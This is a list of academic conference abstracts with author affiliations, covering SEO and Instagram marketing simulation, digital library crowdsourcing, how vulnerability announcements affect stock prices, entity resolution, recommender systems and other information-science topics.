Ioannis C. Drivas, Linnaeus University, Department of Computer Science, Sweden
Apostolos Sarlis, University of Peloponnese, Department of Informatics and Telecommunications, Greece
Alexandros Varveris, National & Kapodistrian University of Athens, Faculty of Law, Greece
Dimitrios Nasiopoulos, University of Peloponnese, Department of Informatics and Telecommunications, Greece
Abstract: In the era of digital marketing competitiveness, the Search Engine Optimization (SEO) process holds the reins for strategically sustainable web positioning and presence for each website owned by a company. However, reduced financial flexibility entails risks in how a company's resources are disseminated to improve website visibility. In this research paper the authors proceed in sequential steps in order not only to indicate a proper dissemination of resources for augmenting website visibility, but also to estimate the return on investment a company can potentially achieve by using an actuarial dynamic simulation modeling approach. In this work, the authors adopt several SEO rectifications recommended in the literature and implement them practically in the websites under examination, which are related to the promotion of scientific journals in the field of marketing. Thereafter, a dynamic simulation procedure takes place in order to specify a proper distribution of the company's resources in line with an improvement of the websites' organic reach, and thus their higher visibility.
Ioannis C. Drivas, Linnaeus University, Department of Computer Science, Sweden
Apostolos Sarlis, University of Peloponnese, Department of Informatics and Telecommunications, Greece
Damianos Sakas, University of Peloponnese, Department of Informatics and Telecommunications, Greece
Abstract: In this research paper the authors highlight the importance of Search Engine Optimization (SEO) of a company's website in order to improve its visibility in the global ranking of websites. First, the authors apply an SEO analysis tool to identify the rectifications needed to augment the website's visibility. Next, the recommendations indicated by the SEO analyzer were implemented and completed, improving the overall SEO rating. Thereafter, a Dynamic Simulation Modeling process takes place to estimate the proper time and way of spending the company's resources for the augmentation of the website's visibility. The model predicted that the total satisfaction of a decision maker with this return on investment gradually increases as each recommendation is implemented under a specific distribution of resources, strengthening the final decision to adopt such a digital marketing tool in the decision maker's quiver.
Apostolos Sarlis, University of Peloponnese, Department of Informatics and Telecommunications, Greece
Damianos Sakas, University of Peloponnese, Department of Informatics and Telecommunications, Greece
Dimitrios Nasiopoulos, University of Peloponnese, Department of Informatics and Telecommunications, Greece
Abstract: Instagram is the largest image-based social media platform. For this reason, it provides an excellent opportunity for companies to promote their products or services. The purpose of this project is to quantify the income an organization or company derives from the use of Instagram relative to the resources invested, by modeling the promotional process. This paper begins by thoroughly analyzing the Instagram platform in order to fully understand how it functions. We then set the objectives that need to be met for the company to achieve its final goal. The main aim is to model the augmentation of interaction between the organization and its users, resulting in further word-of-mouth publicity via Instagram. Subsequently, several actions are defined in order to accomplish these individual goals. However, these actions depend on a plurality of factors, a situation that makes it impossible to predict a specific result. This randomness and ambiguity should be addressed through the use of dynamic simulation models, which give the user the ability to predict the result from specific data. Using the iThink editor, the data are quantified and adjusted, presenting the forthcoming results to the user and simulating a situation based on his or her actions. This decision-making tool contributes greatly to preventing negative or incorrect decisions and to optimizing the division of working time required to accomplish an action. In the current research approach, a dynamic modeling process took place for the construction of an account on this specific social media platform.
Tuula Pääkkönen, National Library of Finland, Centre for Preservation and Digitisation, Finland
Abstract: The National Library of Finland has supported crowdsourcing since the spring of 2014, when a new version of the presentation system for digitized newspapers, journals and ephemera was released at . Since then, there has been a steady increase in the usage of the crowdsourcing features. These new functionalities enable any registered user to collect clippings of articles, images and anything else from the digital collections, creating their own material set. The purpose of this research is to follow how the usage of the crowdsourcing features has evolved over the two years it has been available. In addition, we evaluate how the contractually opened in-copyright materials have begun to be used in crowdsourcing. The metrics of collected clippings show a steady increase in interest in crowdsourcing. Overall, a steady increase is visible over 6-, 12- and 24-month periods. However, there is still significant variance between users: the top users account for 46% of all clippings, whereas there is a long tail of users with just one clipping. Based on this data and on work ongoing in development projects, we feel that crowdsourcing is a viable way for a digital library to attract new kinds of users, both the general public and researchers. However, crowdsourcing requires advocacy, and we should put additional focus on communication, functionalities and content availability.
Acknowledgements: The Aviisi project and this work were funded by the EU Commission through its European Regional Development Fund and the programme Leverage from the EU 2014-2020. Big thanks to Mika Koistinen for hinting about a couple of crowdsourcing projects.
Ioanna Soultana Kotsori, University of Peloponnese, History, Archaeology and Cultural Resources Management, Greece
Abstract: Modern achievements of Medicine are spectacular, but human life has been threatened by this progress. There is a demand for an ethical direction in science with the best possible minimalism. Modern ethics is in a state of crisis: ethical dilemmas arise, according to which society wonders whether, and to what extent, it is legal and feasible for medical research to cross certain boundaries. Research focused on the human being should be driven by respect for the genetic identity of the human being and the protection of anyone who participates. Researchers should respect and protect human rights as well as citizen rights, and therefore neither deliberately take part in illegitimate, inequitable and segregative practices, nor connive at them. Some dilemmas arise directly concerning the ethics of medical research, as well as the question of when it can be moral or not. Bioethics does not come to put a halt on progress; on the contrary, it comes to provide those safeguards that will ensure respect for human dignity, autonomy and meritocratic living.
Georgios Spanos, Aristotle University of Thessaloniki, Informatics, Greece
Lefteris Angelis, Aristotle University of Thessaloniki, Informatics, Greece
Kyriaki Kosmidou, Aristotle University of Thessaloniki, Economics, Greece
Abstract: Nowadays, information security constitutes an urgent issue for businesses and researchers. The security vulnerabilities existing in computer systems are sources of different problems. An indirect and emerging issue regarding the economic consequences of vulnerabilities is the impact of software vulnerability announcements on the stock price of the responsible software vendors. The scope of this paper is the study of the stock market reaction when vulnerability announcements occur, and the correlation analysis between the impact of these events and vulnerability severity according to scoring systems. To measure the impact on the stock market, the event-study methodology, well established in economics, was used. The dataset in this research was collected from the US-CERT (United States Computer Emergency Readiness Team) website and consists of records from the year 2014; the total number of vulnerability announcement events is 75. The results show a slight but not statistically significant negative impact of such events on the stock price of the corresponding firms.
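The event-study computation mentioned above can be sketched roughly as follows. This is a minimal illustration of the market-model variant, assuming a pre-event estimation window and a short event window; the function name, window lengths, and parameters are illustrative, not the authors' actual implementation.

```python
import numpy as np

def car(stock, market, event_idx, est_window=120, event_window=(-1, 1)):
    """Cumulative abnormal return (CAR) around an announcement day.

    stock, market: arrays of daily returns; event_idx: index of the
    announcement day within those arrays.
    """
    # Estimate the market model (alpha, beta) on the window before the event
    s = stock[event_idx - est_window:event_idx]
    m = market[event_idx - est_window:event_idx]
    beta, alpha = np.polyfit(m, s, 1)
    # Abnormal return = actual return minus the market-model expectation
    lo, hi = event_window
    ar = [stock[event_idx + t] - (alpha + beta * market[event_idx + t])
          for t in range(lo, hi + 1)]
    return float(np.sum(ar))
```

Averaging such CARs over all 75 announcement events and testing them against zero is what yields the (in)significance verdict reported above.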
Evangelia Petraki, Athens University of Economics and Business, Department of Informatics, Greece
Emmanuel J. Yannakoudakis, Athens University of Economics and Business, Department of Computer Science, Greece
Abstract: Information retrieval is a necessary and important process for all information systems. In a traditional database, information retrieval is carried out via query languages such as SQL using keywords, while any conceptual information is ignored. The current research is based on the FDB model, which allows the management of any multilingual database, both at the data and the interface level, through a universal schema, and provides for the definition and administration of any multilingual thesaurus. Two different algorithms have been defined for conceptual search in any multilingual FDB database, which exploit the information provided by multilingual thesauri. The first conceptual search algorithm applies common search parameters to all the keywords that form the search criteria. The second algorithm is more flexible than the first, since it allows different search parameters for each keyword; it enables the user to exploit the information provided by the thesauri at a different level for each keyword. At the same time, on a higher level, the user can define logical operators in order to connect the different keywords and their corresponding terms that come from the thesaurus. The purpose of the current paper is to present the conceptual search algorithms and their features, as well as conclusions and recommendations for the interface of a system that will implement conceptual search in any FDB database.
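The idea of the second algorithm, per-keyword search parameters combined with logical operators, might be sketched as follows. The toy thesaurus, the relation names, and the whitespace matching are hypothetical illustrations, not the FDB schema or the authors' algorithms.

```python
# Hypothetical thesaurus: term -> related terms grouped by relation type
THESAURUS = {
    "car": {"synonym": ["automobile"], "broader": ["vehicle"]},
    "boat": {"synonym": ["ship"], "broader": ["vehicle"]},
}

def expand(keyword, relations):
    """Expand one keyword using only the requested thesaurus relations."""
    terms = {keyword}
    for rel in relations:
        terms.update(THESAURUS.get(keyword, {}).get(rel, []))
    return terms

def conceptual_search(records, criteria, operator="AND"):
    """criteria: list of (keyword, relations) pairs, so each keyword can
    carry different search parameters; operator connects the keywords."""
    expansions = [expand(kw, rels) for kw, rels in criteria]
    hits = []
    for rec in records:
        words = set(rec.lower().split())
        matched = [bool(words & {t.lower() for t in exp}) for exp in expansions]
        ok = all(matched) if operator == "AND" else any(matched)
        if ok:
            hits.append(rec)
    return hits
```

In the first algorithm, by contrast, the same `relations` list would be applied uniformly to every keyword in the criteria.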
Kostas Stefanidis, University of Tampere, School of Information Sciences, Finland
Abstract: In the Web of data, entities are described by interlinked data rather than documents on the Web. In this talk, we focus on entity resolution in the Web of data, i.e., on the problem of identifying descriptions that refer to the same real-world entity within one or across knowledge bases in the Web of data. To reduce the required number of pairwise comparisons among descriptions, methods for entity resolution typically perform a pre-processing step, called blocking, which places similar entity descriptions into blocks and executes comparisons only between descriptions within the same block. The objective of this talk is to present challenges and algorithms for blocking for entity resolution, stemming from the Web openness in describing, by an unbounded number of KBs, a multitude of entity types across domains, as well as the high heterogeneity (semantic and structural) of descriptions, even for the same types of entities.
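The blocking step described above can be illustrated with the simplest scheme, token blocking. This is a hedged sketch assuming whitespace tokenization over attribute values; real systems for the Web of data use far more elaborate blocking keys to cope with heterogeneity.

```python
from collections import defaultdict
from itertools import combinations

def token_blocking(descriptions):
    """Place entity descriptions sharing at least one token into the
    same block. descriptions: {entity_id: {attribute: value}}."""
    blocks = defaultdict(set)
    for eid, desc in descriptions.items():
        for value in desc.values():
            for token in str(value).lower().split():
                blocks[token].add(eid)
    # Blocks with a single entity produce no comparisons; drop them
    return {t: ids for t, ids in blocks.items() if len(ids) > 1}

def candidate_pairs(blocks):
    """Distinct pairs to compare, instead of all pairwise comparisons."""
    pairs = set()
    for ids in blocks.values():
        pairs.update(combinations(sorted(ids), 2))
    return pairs
```

Here only entities that share a token are ever compared, which is exactly the quadratic-cost reduction that motivates blocking.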
Tomislav Ivanjko, University of Zagreb, Faculty of Humanities and Social Sciences, Department of Information and Communication Sciences, Croatia
Abstract: This paper explores possible approaches to the analysis of folksonomies in subject indexing of heritage materials, in order to examine user tags as a method complementing traditional subject access in the online environment. The research was undertaken using crowdsourcing methods, namely a Game With a Purpose, where a corpus of 14,402 submitted tags on 80 selected heritage objects divided into 4 categories (library, archive, museum and photographs) was gathered for statistical, linguistic and content analysis. Statistical analysis of the gathered corpus has shown that after a certain threshold is reached, the vocabulary base remains steady, with only frequencies increasing. Linguistic analysis showed that a typical user tag consists of one word or phrase in the singular, while content analysis identified most user tags as generic descriptors without added specific knowledge.
Paolino Di Felice, University of L'Aquila, Industrial and Information Engineering and Economics, Italy
Abstract: The solution of many problems of real interest requires an appropriate integration of descriptive data with geographic data. This class of problems includes the computation of a ranking of railway stations according to their degree of exposure to landslide hazard. Such buildings are a relevant category of elements exposed to geo-hazards because of their intrinsic value and also because their damage may cause human casualties as well. The ranking we are talking about is the starting point for implementing selective monitoring of those assets in order to protect their safety. Most countries in the world are exposed to geological instability. Italy falls among these countries, as pointed out by a very recent study published by Legambiente (2014). From it, we learn that 81.2% of Italian municipalities are at risk of geological instability, with almost 6 million people living in areas of high geo-hydrological risk, and with 61.5 billion euro spent between 1944 and 2012 on damage caused by extreme events alone. The present work: a) adopts the general method proposed by Di Felice (2015) to calculate the ranking of railway stations according to the landslide hazard they are exposed to; b) describes the structure of a Geo-DataBase suitable for storing the data of the problem and facilitating its solution. The effectiveness of a Geo-DataBase as a tool for the management of geo-hazards has already been testified by Morelli and his colleagues (2012). References: Legambiente, 2014. Mappa del rischio climatico nelle città italiane. Di Felice, P., 2015. Integration of descriptive and spatial data to rank public buildings according to their exposure to landslide hazard. 5th International Conference on Integrated Information, IC-ININFO 2015, September 21-24, 2015, Mykonos, Greece. Morelli, S. et al., 2012. Urban planning, flood risk and public policy: The case of the Arno River, Firenze, Italy. Applied Geography, 34, 205-218.
Fuyuki Yoshikane, University of Tsukuba, Graduate School of Library, Information and Media Studies, Japan
Tsuyoshi Kudo, Japan Research Institute, Money Markets System Development Department I, Japan
Abstract: This study proposes a quantitative method for investigating technology trends from a perspective that gives attention to technology fusion, and applies it to Japanese automobile-related manufacturers. This method enables an objective investigation of technology trends with respect to technology-fusion-type research and development, which has grown in importance in recent years. The proposed method adopts the following procedure. Step 1: building networks based on the co-occurrence of patent classifications. We build networks of technology fusion relationships according to the classifications associated with patents, assuming that technology fusion appears as the co-occurrence of different classifications in each patent. Specifically, these are directed graphs where a node represents a classification and an arc is oriented from the primary classification of a patent to its auxiliary classification. Step 2: calculating network-related feature values and implementing multivariate analyses based on them. The following feature values are used to examine the structural characteristics of the technology fusion networks created in Step 1 (including the diversity and concentration of technology fusion relationships): density; average path length; the 75th percentile values of indegree, outdegree, betweenness centrality, and arc strength; and the standard deviation of indegree, outdegree, betweenness centrality, and arc strength. Finally, the calculated feature values are applied to a principal component analysis and a cluster analysis. In the cluster analysis, the Canberra distance and Ward's method are adopted. The cluster analysis is implemented in order to clearly demonstrate which networks are similar to each other. By comparing the results of the two analyses, we ascertain the characteristics of each network.
Using this method, we investigated the technology trends of 18 major Japanese automobile-related manufacturers: Toyota, Nissan Motor, Honda, Mazda, Mitsubishi, Isuzu, Suzuki, Daihatsu, Fuji, Hino, Nissan Diesel, Yamaha, Kawasaki, Pioneer, Kenwood, Alpine, Sony, and Clarion. It was clarified that there are remarkable differences between manufacturers assembling entire automobiles and those mainly producing accessory parts in terms of the structural characteristics of their technology fusion networks. We can easily imagine that the classifications themselves assigned to patents tend to differ between the two types of manufacturers because they require different technologies. However, it is not necessarily self-evident that the network structures of the classifications also differ between them. This is an interesting result. Manufacturers of accessory parts (e.g., car audio and navigation systems) require technology fusion to play a role in applying audio, imaging, and communication technologies to automobiles, that is to say, the unidirectional application of technologies. On the other hand, manufacturers of entire automobiles require technology fusion to play a role in combining various related technologies into products, that is to say, the integration of technologies. It can be assumed that this difference appears in the structures of their technology fusion networks.
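The two-step procedure above might be sketched as follows. The patent records, the classification codes, and the subset of feature values shown are illustrative assumptions in plain Python, not the authors' data or full feature set.

```python
from collections import Counter
import statistics

def fusion_network(patents):
    """Step 1. patents: list of (primary_class, [auxiliary_classes]).
    Returns arc weights for the directed graph primary -> auxiliary."""
    arcs = Counter()
    for primary, auxiliaries in patents:
        for aux in auxiliaries:
            arcs[(primary, aux)] += 1
    return arcs

def network_features(arcs):
    """Step 2 (excerpt): a few of the network-level feature values."""
    nodes = {n for arc in arcs for n in arc}
    n = len(nodes)
    outdeg = Counter(src for src, _ in arcs)
    indeg = Counter(dst for _, dst in arcs)
    return {
        "density": len(arcs) / (n * (n - 1)) if n > 1 else 0.0,
        # 75th percentile of outdegree over all nodes
        "outdegree_p75": statistics.quantiles(
            [outdeg.get(v, 0) for v in sorted(nodes)], n=4)[2],
        # standard deviation of indegree over all nodes
        "indegree_sd": statistics.pstdev(
            [indeg.get(v, 0) for v in sorted(nodes)]),
    }
```

Feature vectors computed this way, one per manufacturer network, would then feed the principal component and cluster analyses described above.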
Acknowledgements: This work was partially supported by Grant-in-Aid for Scientific Research (C) 26330361 (2014) from the Ministry of Education, Culture, Sports, Science and Technology, Japan, and we would like to express our gratitude for this support.
Maha Hana, Helwan University, Faculty of Computers and Information Systems (currently: Canadian International College), Information Systems, Egypt
Abstract: The World Bank annual report contains vital data indicators for many countries. Data mining techniques help in studying the underlying relations between different indicators. This research proposes a clustering system for Egypt's World Bank indicators. The proposed system has three phases: a preprocessing phase, a clustering phase and an analysis phase. The preprocessing phase consolidates Egypt's data and prepares it for clustering. The clustering phase estimates the appropriate number of clusters and uses K-means to cluster both the years' data and the indicator data values. The analysis phase uses principal component analysis to find the most important indicators for each type of cluster. The results indicate that the years' clusters are more compact and separated than the indicators' clusters, yet the years' clusters have more important indicators than the indicator data value clusters.
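The clustering phase could be sketched along the following lines, a minimal plain-Python K-means over numeric feature vectors. The proposed system's actual feature preparation, cluster-count estimation, and PCA-based analysis phase are omitted, and all data here is illustrative.

```python
import random

def kmeans(points, k, iters=50, seed=0):
    """Minimal K-means: points is a list of equal-length numeric tuples."""
    rng = random.Random(seed)
    centers = rng.sample(points, k)
    for _ in range(iters):
        # Assignment step: each point joins its nearest center
        clusters = [[] for _ in range(k)]
        for p in points:
            d = [sum((a - b) ** 2 for a, b in zip(p, c)) for c in centers]
            clusters[d.index(min(d))].append(p)
        # Update step: move each center to the mean of its cluster
        for i, cl in enumerate(clusters):
            if cl:
                centers[i] = tuple(sum(x) / len(cl) for x in zip(*cl))
    return centers, clusters
```

Running this once per candidate k and comparing within-cluster spread is one common way to estimate the appropriate number of clusters, as the abstract's clustering phase requires.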
Habib Hadj Mabrouk, IFSTTAR: French Institute of Science and Technology for Transport, Spatial Planning, Development and Networks, COSYS-ESTAS, France
Abstract: Knowledge acquisition was recognized as a bottleneck from the first appearance of expert systems, or more generally knowledge-based systems (KBS). It is still considered to be a crucial task in their creation. Extraction or elicitation refers to the collection of knowledge from experts in the field, whereas the concepts of transfer or transmission of expertise refer to the collection and subsequent formalization of the knowledge of a human expert. The term knowledge acquisition refers to all the activities required in order to create the knowledge base of an expert system. Knowledge acquisition (KA) is one of the central concerns of research into KBSs and one of the keys not only to the successful development of a system of this type but also to its integration and utilization within an operational environment. Two main participants are involved in KA: the expert, who possesses know-how of a type which is difficult to express, and the cognitive scientist, who has to extract and formalize the knowledge related to this know-how, which as far as the expert is concerned is usually implicit rather than explicit. This time-consuming and difficult process is nevertheless fundamental to the creation of an effective knowledge base. While KA was at the outset centred around the expert/cognitive-scientist pairing, it very soon raised crucial problems such as the identification of the needs of users or the selection of a means of representing knowledge. The excessive divergence between the language which the experts used in order to describe their problem and the level of abstraction used in representational formalizations of knowledge provided the motivation for a large amount of research aimed at facilitating the transfer of expertise. The new KA approaches aim to specify more effective methodologies and to design software which assists or partially replaces the cognitive scientist.
Some work suggests viewing the design of a KBS as a process of constructing a conceptual model, on the basis of all the available sources of knowledge (human or documentary) which relate to solving the problem. In this context KA is perceived as a modelling activity. Other research stresses the benefits of methods which guide the cognitive scientist in the transfer/modelling process. Tools and techniques are used to provide assistance with verbalisation, interviews with experts and document analysis. Currently available KA techniques mainly originate in cognitive psychology (human reasoning models, knowledge collection techniques), ergonomics (analysis of the activities of experts and the future user), linguistics (to exploit documents more effectively or to guide the interpretation of verbal data) and software engineering (description of the life cycle of a KBS). In summary, KA may be defined as being those activities which are necessary in order to collect, structure and formalize knowledge in the context of the design of a KBS. A survey of state of the art research in the domain of knowledge acquisition made it possible to select a method for developing a KBS for aid in the analysis of safety for automated terrestrial transport systems. This method showed itself to be useful for extracting and formalizing historical safety analysis knowledge (essentially accident scenarios) and revealed its limits in the context of the expert safety analysis, which is particularly based on intuition and imagination. In general, current knowledge acquisition techniques have been designed for clearly structured problems. They do not tackle the specific problems associated with multiple areas of expertise and the coexistence of several types of knowledge and it is not possible to introduce the subjective and intuitive knowledge which is related to a rapidly evolving and unbounded field such as safety. 
Although cognitive psychology and software engineering have produced knowledge acquisition methods and tools, their utilization is still very restricted in a complex industrial context. Transcribing verbal (natural) language into a formal language which can be interpreted by a machine often distorts the knowledge of the expert. This introduces a bias in passing from the cognitive model of the expert to the implemented model. This disparity is in part due to the fact that the representational languages which are used in AI are not sufficiently rich to explain the cognitive function of experts and in part to the subjective interpretation of the cognitive scientist. These constraints act together to limit progress in the area of knowledge acquisition. One possible way of reducing these constraints is combined utilization of knowledge acquisition and machine learning techniques. Experts generally consider that it is simpler to describe examples or experimental situations than it is to explain decision making processes. Introducing machine learning systems which operate on the basis of examples can generate new knowledge which can assist experts in solving a specific problem. The know-how of experts depends on subjective, empirical, and occasionally implicit knowledge which may give rise to several interpretations. There is generally speaking no scientific explanation which justifies this compiled expertise. This difficulty emanates from the complexity of expertise which naturally encourages experts to give an account of their know-how which involves significant examples or scenarios which they have experienced on automated transport systems which have already been certified or approved. Consequently, expertise should be updated by means of examples. Machine learning can facilitate the transfer of knowledge, particularly when its basis consists of experimental examples. 
It contributes to the development of the knowledge bases while at the same time reducing the involvement of cognitive scientists. In our approach, learning made use of the historical scenario knowledge base (HSKB) to generate new knowledge likely to assist experts in evaluating the degree of safety of a new transport system. Learning is a very general term which describes the process by which human beings or machines increase their knowledge. Learning therefore involves reasoning: discovering analogies and similarities, generalizing or particularizing an experience, making use of previous failures and errors in subsequent reasoning. The new knowledge is used to solve new problems, to carry out a new task or improve performance of an existing task, to explain a situation or predict behaviour. The design of knowledge acquisition aid tools which include learning mechanisms is essential for the production and industrial development of KBSs. This discipline is regarded as being a promising solution for knowledge acquisition aid and attempts to answer certain questions: how can a mass of knowledge be expressed clearly, managed, added to and modified? Machine learning is defined by a dual objective: a scientific objective (understanding and mechanically producing phenomena of temporal change and the adaptation of reasoning) and a practical objective (the automatic acquisition of knowledge bases from examples). Learning may be defined as the improvement of performance through experience. Learning is intimately connected to generalization: learning consists of making the transition from a succession of experienced situations to knowledge which can be re-utilized in similar situations. Expertise in a domain is not only possessed by experts but is also implicitly contained in a mass of historical data which it is very difficult for the human mind to summarize. One of the objectives of machine learning is to extract relevant knowledge from this mass of information for explanatory or decision making purposes.
However, learning from examples is insufficient as a means of acquiring the totality of expert knowledge and knowledge acquisition is necessary in order to identify the problem which is to be solved and to extract and formalize the knowledge which is accessible by customary means of acquisition. In this way each of the two approaches is able to make up for the shortcomings of the other. In order to improve the process of expertise transfer, it is therefore beneficial to combine both processes in an iterative knowledge acquisition process. Our approach has been to exploit the historical scenario knowledge base by means of learning with a view to producing knowledge which could provide assistance to experts in their task of evaluating the level of safety of a new system of transport.
Patrick OBrien, Montana State University, Library, United States
Abstract: Some studies indicate a positive, if tenuous, link between institutional repositories (IRs) and author citation rates (Norris, Oppenheim, & Rowland, 2008). However, no comprehensive studies currently exist to prove or disprove this connection. Our previously published research (Arlitsch & O’Brien, 2012; Arlitsch & O’Brien, 2013) demonstrates that IRs can make scholarly works more accessible via search engines. Our hypothesis is that making research accessible sooner, via an Open Access IR, should lead to increases in author citation rates, which in turn would eventually improve worldwide university rankings. However, there are no datasets that would allow a researcher to perform this analysis with any statistical confidence. Moreover, the library community lacks the web metric standards a researcher would need to verify or compare results across institutions. A key measure of IR impact is the number of item downloads. Google Analytics, a free service used by most academic libraries, relies on HTML page tracking to log IR activity on Google’s servers. A recent study led by Montana State University provides evidence from four institutions that IRs using Google Analytics miss between 90% and 100% of IR item downloads and grossly underestimate their IR activity. The study also proposes a standard framework for improving the reporting accuracy and evaluation of IR activity across institutions.
Vasilis Efthymiou, ICS-FORTH, Greece
Petros Zervoudakis, University of Crete, Greece
Kostas Stefanidis, University of Tampere, School of Information Sciences, Finland
Dimitris Plexousakis, ICS-FORTH, Greece
Abstract: Recommender systems have received significant attention, with most of the proposed methods focusing on recommendations for single users. However, there are contexts in which the items to be suggested are intended not for a single user but for a group of people. For example, assume a group of friends or a family that is planning to watch a movie or visit a restaurant. In this work, we propose an extensive model for group recommendations that exploits items that users similar to the group members liked in the past. We follow two different approaches for offering recommendations to the members of a group: considering the members of a group as a single user and recommending to this user items that similar users liked, or first estimating how much each group member would like an item and then recommending the items that would satisfy the most (dissatisfy the fewest) members of the group. For each of the two approaches, we introduce a different MapReduce algorithm and evaluate the results on real data from the movie industry.
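The second approach described above, scoring an item per group member and then aggregating, can be sketched as follows. This is a minimal illustration; the aggregation strategies, function names and toy data are assumptions for exposition, not taken from the paper (which implements both approaches as MapReduce algorithms):

```python
# Hypothetical sketch: aggregate per-member predicted ratings into a group score,
# then rank items for the group. Data and names are illustrative.

def aggregate_group_score(member_scores, strategy="least_misery"):
    """Combine per-member predicted ratings into one group score."""
    if strategy == "least_misery":
        return min(member_scores)          # avoid items any member dislikes
    if strategy == "most_pleasure":
        return max(member_scores)
    return sum(member_scores) / len(member_scores)  # plain average

def recommend_for_group(predictions, k=2, strategy="least_misery"):
    """predictions: {item: [score per member]} -> top-k items for the group."""
    ranked = sorted(predictions.items(),
                    key=lambda kv: aggregate_group_score(kv[1], strategy),
                    reverse=True)
    return [item for item, _ in ranked[:k]]

predictions = {
    "movie_a": [4.5, 4.0, 3.8],
    "movie_b": [5.0, 2.0, 4.5],   # one member strongly dislikes it
    "movie_c": [3.9, 4.1, 4.0],
}
print(recommend_for_group(predictions))
```

Under the least-misery strategy, movie_b is pushed down despite its high average, because one member rated it poorly.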
Emmanouil Marakakis, Technological Educational Institute of Crete, Department of Informatics Engineering, Greece
Nikos Papadakis, Technological Educational Institute of Crete, Department of Informatics Engineering, Greece
Haridimos Kondylakis, Foundation for Research and Technology - Hellas (FORTH), Institute of Computer Science, Greece
Aris Papakonstantinou, Technological Educational Institute of Crete, Department of Informatics Engineering, Greece
Abstract: As users struggle to navigate the vast amount of information now available, methods and tools for enabling the quick exploration of database content are of paramount importance. In this direction we present Apantisis, a novel question answering system implemented for the Greek language, ready to be attached to any external database/knowledge base. An ingestion module enables the semi-automatic construction of the data dictionary that is used for question answering, whereas the Greek Language Dictionary and the Syntactic and Semantic Rules are stored in an internal, extensible knowledge base. After the ingestion phase, the system accepts questions in natural language and automatically constructs the corresponding relational algebra query, to be further evaluated by the external database. The results are then formulated as free text and returned to the user. We highlight the unique features of our system with respect to the Greek language and present its implementation and a preliminary evaluation. Finally, we argue that our solution is flexible and modular and can be used to improve the usability of traditional database systems.
Chihli Hung, Chung Yuan Christian University, Information Management, Taiwan
Chih-Hang Wu, Chung Yuan Christian University, Department of Information Management, Taiwan, Province Of China
Abstract: The process of gathering, extracting, summarizing and analyzing popular events on the Internet is the task of public opinion mining. Most traditional public opinion mining tasks extract and analyze popular events from a static data set using clustering-based methods, such as K-means, or probability models, such as latent Dirichlet allocation. However, information spreading on the Internet is ever-growing and public opinions are non-stationary. Most existing opinion mining models in the literature suffer from the curse of dimensionality when dealing with ever-growing and non-stationary data. This paper therefore proposes the two-stage distributed clustering (TSDC) model, based on the MapReduce concept, to mine public opinions. At the first clustering stage, many self-organizing maps (SOMs) are used for ever-growing and non-stationary data; each individual SOM deals with time-based news. At the second clustering stage, K-means clustering is used to integrate the output of the first, distributed SOM clustering stage. According to our initial experiments, the TSDC model mines public opinions more efficiently and effectively than the traditional one-stage clustering model.
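The two-stage scheme summarized above can be sketched roughly as follows: a small SOM is trained on each time-based partition of the stream, and K-means then clusters the collected SOM prototypes. This is a toy illustration only; the SOM variant (a 1-D grid here), the parameters and the data are assumptions, not the authors' implementation:

```python
import numpy as np

rng = np.random.default_rng(0)

def train_som(data, grid=4, epochs=20, lr=0.5):
    """Minimal 1-D SOM: returns `grid` prototype vectors for one partition."""
    protos = data[rng.choice(len(data), grid, replace=False)].astype(float)
    for epoch in range(epochs):
        sigma = max(grid / 2 * (1 - epoch / epochs), 0.5)  # shrinking neighbourhood
        for x in data:
            bmu = np.argmin(np.linalg.norm(protos - x, axis=1))  # best-matching unit
            for j in range(grid):
                h = np.exp(-((j - bmu) ** 2) / (2 * sigma ** 2))
                protos[j] += lr * h * (x - protos[j])
    return protos

def kmeans(points, k=3, iters=50):
    """Plain K-means over the collected SOM prototypes (stage two)."""
    centers = points[rng.choice(len(points), k, replace=False)]
    for _ in range(iters):
        labels = np.argmin(
            np.linalg.norm(points[:, None] - centers[None], axis=2), axis=1)
        for c in range(k):
            if np.any(labels == c):
                centers[c] = points[labels == c].mean(axis=0)
    return centers, labels

# Three "time-based" partitions of a growing news stream (toy 2-D data).
partitions = [rng.normal(loc=c, scale=0.3, size=(100, 2)) for c in (0.0, 3.0, 6.0)]
stage1 = np.vstack([train_som(p) for p in partitions])   # stage 1: one SOM per partition
centers, labels = kmeans(stage1, k=3)                    # stage 2: K-means on prototypes
print(centers.round(1))
```

Because stage two operates on a handful of prototypes rather than the full stream, new partitions can be summarized independently (the map step) and merged cheaply (the reduce step).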
Emmanouil Marakakis, Technological Educational Institute of Crete, Department of Informatics Engineering, Greece
Koralia Papadokostaki, Technological Educational Institute of Crete, Department of Informatics Engineering, Greece
Stavros Charitakis, Technological Educational Institute of Crete, Department of Informatics Engineering, Greece
George Vavoulas, Technological Educational Institute of Crete, Department of Informatics Engineering, Greece
Stella Panou, Technological Educational Institute of Crete, Department of Informatics Engineering, Greece
Paraskevi Piperaki, Technological Educational Institute of Crete, Department of Informatics Engineering, Greece
Aris Papakonstantinou, Technological Educational Institute of Crete, Department of Informatics Engineering, Greece
Savvas Lemonakis, Technological Educational Institute of Crete, Department of Informatics Engineering, Greece
Anna Maridaki, Technological Educational Institute of Crete, Department of Informatics Engineering, Greece
Konstantinos Iatrou, Technological Educational Institute of Crete, Department of Informatics Engineering, Greece
Piotr Arent, Technological Educational Institute of Crete, Department of Informatics Engineering, Poland
Dawid Wiśniewski, Technological Educational Institute of Crete, Department of Informatics Engineering, Poland
Nikos Papadakis, Technological Educational Institute of Crete, Department of Informatics Engineering, Greece
Haridimos Kondylakis, Foundation for Research and Technology - Hellas (FORTH), Institute of Computer Science, Greece
Abstract: As the internet grows daily and millions of news articles are produced every day worldwide by various sources, the need to store, index, search and explore news articles is more pressing than ever. In this paper we present an integrated platform dedicated to news articles, providing storage, indexing and searching functionalities, implemented using semantic web technologies and services. Besides using the developed APIs, users can, through intuitive graphical user interfaces, save articles from RSS channels, import them through wrappers from external news sites, or insert them manually using forms. A search engine on top allows users to explore all registered information. All components have been implemented using semantic web technologies: a novel ontology to model the news domain, a triple store for the management of data, and web services exchanging JSON-LD messages. The registered articles automatically become part of the Linked Open Data cloud, enabling better data and knowledge sharing. Our preliminary evaluation shows the high quality of the developed platform and the benefits of our approach.
Mariam Gawich, Ain Shams University, Computer Science, Egypt
Marco Tawfik, Faculty of Computer and information Science - Ain Shams University, Computer Science, Egypt
Mostafa Aref, Faculty of Computer and information Science - Ain Shams University, Computer Science, Egypt
Abdel-Badeeh Salem, Faculty of Computer and information Science - Ain Shams University, Computer Science, Egypt
Abstract: The social media domain has its own terms, phrases, grammar and emoticons. Text mining and analysis therefore require specific natural language processing techniques, as well as specific ontologies that include slang terms and expressions. Moreover, the discovery of new information from social media forums can be achieved by matching slang terms and expressions against a social media ontology. This paper investigates ontology-based matching approaches applied to social media.
